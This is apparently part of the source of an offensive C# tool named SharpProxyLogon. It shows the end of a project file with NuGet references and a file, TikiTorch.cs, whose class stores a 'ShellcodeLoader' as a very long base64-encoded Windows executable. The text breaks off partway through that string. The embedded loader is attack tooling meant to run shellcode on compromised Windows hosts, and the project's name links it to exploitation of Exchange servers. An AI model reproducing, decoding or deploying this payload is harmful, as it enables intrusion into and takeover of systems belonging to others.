186 | 187 | ..\packages\System.Security.Cryptography.X509Certificates.4.3.0\lib\net461\System.Security.Cryptography.X509Certificates.dll 188 | True 189 | True 190 | 191 | 192 | ..\packages\System.Text.RegularExpressions.4.3.0\lib\net463\System.Text.RegularExpressions.dll 193 | True 194 | True 195 | 196 | 197 | 198 | 199 | 200 | 201 | 202 | ..\packages\System.Xml.ReaderWriter.4.3.0\lib\net46\System.Xml.ReaderWriter.dll 203 | True 204 | True 205 | 206 | 207 | 208 | 209 | 210 | 211 | 212 | 213 | 214 | 215 | 216 | 217 | 218 | 219 | 220 | 221 | 222 | This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them. For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}. 223 | 224 | 225 | 226 | 227 | -------------------------------------------------------------------------------- /SharpProxyLogon/TikiTorch.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace SharpProxyLogon 8 | { 9 | public class TikiTorch 10 | { 11 | public static string ShellcodeLoader = @"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